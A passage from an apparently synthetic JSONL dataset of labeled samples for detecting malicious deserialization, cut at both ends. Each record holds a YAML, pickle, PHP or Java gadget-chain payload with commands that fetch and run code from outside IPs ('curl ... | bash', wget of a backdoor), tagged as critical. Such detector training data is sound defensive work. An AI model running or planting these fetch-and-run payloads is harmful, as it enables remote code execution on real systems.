"O:8:\"Exploit\":1:{s:4:\"data\";s:64:\"Ot+4PkK9C+T9iwjyxkf6u91vfIGfRFkmEmLsQG2s\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://141.4.181.110/bd\")"}}]} {"id": "synth_malicious_deserialization_00169", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://140.9.150.22/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://31.156.158.36/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://140.9.150.22/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://31.156.158.36/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00170", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://6.59.83.23/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://248.114.9.175/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://6.59.83.23/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://248.114.9.175/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00171", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('V9lT4rxxpKqy5P0CqdobRuDcoIxnv6/yu058Z3MyKujOORWNmnwTHkXwNb8d')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://253.128.232.20/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('V9lT4rxxpKqy5P0CqdobRuDcoIxnv6/yu058Z3MyKujOORWNmnwTHkXwNb8d')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00172", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:55:\"30a7ppMZfYDR4SKpiR2zQUz472U1M2eBac4vLNek\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://34.211.229.71/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:55:\"30a7ppMZfYDR4SKpiR2zQUz472U1M2eBac4vLNek\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://34.211.229.71/bd\")"}}]} {"id": "synth_malicious_deserialization_00173", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://207.218.168.164/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://207.218.168.164/shell\")"}}]} {"id": "synth_malicious_deserialization_00174", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://227.37.19.169/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://227.37.19.169/shell\")"}}]} {"id": "synth_malicious_deserialization_00175", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:26:\"QuyEJwZAHBDYhAkbtXYQZuSsPGGbwaqbP8E3UPSO\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://85.157.22.59/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:26:\"QuyEJwZAHBDYhAkbtXYQZuSsPGGbwaqbP8E3UPSO\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://85.157.22.59/bd\")"}}]} {"id": "synth_malicious_deserialization_00176", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:76:\"LSdZlOI1cbEvA1O2RswD+ZTQusaLlIhyDvKNouPE\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://190.60.88.212/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:76:\"LSdZlOI1cbEvA1O2RswD+ZTQusaLlIhyDvKNouPE\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://190.60.88.212/bd\")"}}]} {"id": "synth_malicious_deserialization_00177", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('qOrChYnfmHpFYxqC6b5mWkl9YKM14xK2wqCSC+0WEI+OKloAfNsgjFQ2bT/+')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://242.153.19.63/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('qOrChYnfmHpFYxqC6b5mWkl9YKM14xK2wqCSC+0WEI+OKloAfNsgjFQ2bT/+')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00178", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:33:\"879B7IGowLEul+Hq0pBjuI76nGg2iGBVb4Uit/xg\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://102.102.28.162/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:33:\"879B7IGowLEul+Hq0pBjuI76nGg2iGBVb4Uit/xg\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://102.102.28.162/bd\")"}}]} {"id": "synth_malicious_deserialization_00179", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('vhOQj73YcaQUeNi9y6BVZ2ZROIq+l0VIro0wtzaMHJPXqwKkIVMK15mC4s7R')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://210.243.74.156/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('vhOQj73YcaQUeNi9y6BVZ2ZROIq+l0VIro0wtzaMHJPXqwKkIVMK15mC4s7R')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00180", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://233.63.165.22/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://233.63.165.22/shell\")"}}]} {"id": "synth_malicious_deserialization_00181", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://232.49.215.233/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://24.218.29.103/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://232.49.215.233/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://24.218.29.103/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00182", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:55:\"5k517vH5OVADqA/PbCKO6vUNj1qDgvnZ8b4H16Ks\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://49.188.45.76/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:55:\"5k517vH5OVADqA/PbCKO6vUNj1qDgvnZ8b4H16Ks\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://49.188.45.76/bd\")"}}]} {"id": "synth_malicious_deserialization_00183", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('CV0WjLV+lBeRLdCmiEUoXcmKhaM1f1X+sKatsb1ySpfIDMucGFnc7DAEuj5z')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://85.10.66.74/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('CV0WjLV+lBeRLdCmiEUoXcmKhaM1f1X+sKatsb1ySpfIDMucGFnc7DAEuj5z')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00184", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:36:\"A4Tnz5gVMLcF8K76KuAy20/vSPhcGQ2AIRCxUr1U\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://115.194.135.202/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:36:\"A4Tnz5gVMLcF8K76KuAy20/vSPhcGQ2AIRCxUr1U\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://115.194.135.202/bd\")"}}]} {"id": "synth_malicious_deserialization_00185", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://113.69.88.253/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://198.153.95.18/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://113.69.88.253/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://198.153.95.18/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00186", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://241.20.118.71/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://241.20.118.71/shell\")"}}]} {"id": "synth_malicious_deserialization_00187", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:21:\"dYcZEdUUZDyg1WpxuqsrZyX9hbr4CTedkiVFsg+o\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://22.36.11.146/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:21:\"dYcZEdUUZDyg1WpxuqsrZyX9hbr4CTedkiVFsg+o\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://22.36.11.146/bd\")"}}]} {"id": "synth_malicious_deserialization_00188", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://210.189.233.194/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://210.189.233.194/shell\")"}}]} {"id": "synth_malicious_deserialization_00189", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://144.229.28.5/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://144.229.28.5/shell\")"}}]} {"id": "synth_malicious_deserialization_00190", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('hxbZqhRpQl7IvouuvbkWWPuYSU4UzLdSLZAbGO7cBZFtxQi+HliFZnUr6cBx')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://52.70.248.204/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('hxbZqhRpQl7IvouuvbkWWPuYSU4UzLdSLZAbGO7cBZFtxQi+HliFZnUr6cBx')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00191", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('admWNJcwV+6m0LhrsID9oycwgiR3P9nqxdKlAB+uThl4tbUbBHnK/laVuojl')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://107.82.10.154/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('admWNJcwV+6m0LhrsID9oycwgiR3P9nqxdKlAB+uThl4tbUbBHnK/laVuojl')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00192", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://28.153.142.119/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://134.223.95.166/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://28.153.142.119/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://134.223.95.166/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00193", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:68:\"2wC63mgTJ6wDNKBlNVBj8WgWB60y/AZ79hxPQSjM\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://144.23.203.93/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:68:\"2wC63mgTJ6wDNKBlNVBj8WgWB60y/AZ79hxPQSjM\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://144.23.203.93/bd\")"}}]} {"id": "synth_malicious_deserialization_00194", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://182.189.76.141/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://182.189.76.141/shell\")"}}]} {"id": "synth_malicious_deserialization_00195", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://151.248.103.126/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://151.248.103.126/shell\")"}}]} {"id": "synth_malicious_deserialization_00196", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://55.99.65.164/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://55.99.65.164/shell\")"}}]} {"id": "synth_malicious_deserialization_00197", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('NbEUlhSYO9pyWm1xsQLsaQsMW/oNHWC1RNjFZI+8rC4s26kgY2VpYj97eojV')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://131.32.44.189/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('NbEUlhSYO9pyWm1xsQLsaQsMW/oNHWC1RNjFZI+8rC4s26kgY2VpYj97eojV')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00198", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:72:\"v8rE5+bGMguD55Zl336NVJzOLUuVJeBvnYLCxV2Y\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://243.203.177.101/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:72:\"v8rE5+bGMguD55Zl336NVJzOLUuVJeBvnYLCxV2Y\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://243.203.177.101/bd\")"}}]} {"id": "synth_malicious_deserialization_00199", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://192.61.101.79/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://218.252.189.100/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://192.61.101.79/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://218.252.189.100/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00200", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('Fg4DEO2pBJqmI39LVdnM4NI8T9bIyUc0Q9KDqZFZDUGOkbj1g6ymCnix3HSE')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://209.32.254.122/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Fg4DEO2pBJqmI39LVdnM4NI8T9bIyUc0Q9KDqZFZDUGOkbj1g6ymCnix3HSE')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00201", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:28:\"LvHYCbyPlpboNP2Mtip2BvxKH8710dcEsYqpDbR7\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://23.172.128.96/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:28:\"LvHYCbyPlpboNP2Mtip2BvxKH8710dcEsYqpDbR7\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://23.172.128.96/bd\")"}}]} {"id": "synth_malicious_deserialization_00202", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://235.82.83.13/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://252.117.36.196/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://235.82.83.13/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://252.117.36.196/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00203", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://137.135.168.117/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://87.198.121.130/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://137.135.168.117/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://87.198.121.130/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00204", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:53:\"dz68dEVcsiqEKcidxjmXSaqQ0Pm/2S1+s0KhVJB3\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://82.200.183.250/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:53:\"dz68dEVcsiqEKcidxjmXSaqQ0Pm/2S1+s0KhVJB3\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://82.200.183.250/bd\")"}}]} {"id": "synth_malicious_deserialization_00205", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://66.185.43.54/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://154.23.150.11/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://66.185.43.54/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://154.23.150.11/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00206", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://50.239.238.6/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://50.239.238.6/shell\")"}}]} {"id": "synth_malicious_deserialization_00207", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:44:\"6urfhVUwwQlMsZlkFahVX3Eik65CnixF0Xu5w9k4\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://123.181.27.52/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:44:\"6urfhVUwwQlMsZlkFahVX3Eik65CnixF0Xu5w9k4\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://123.181.27.52/bd\")"}}]} {"id": "synth_malicious_deserialization_00208", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://211.46.206.76/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://89.204.94.227/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://211.46.206.76/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://89.204.94.227/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00209", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://4.199.57.132/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://88.107.109.52/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://4.199.57.132/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://88.107.109.52/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00210", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://46.208.220.243/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl 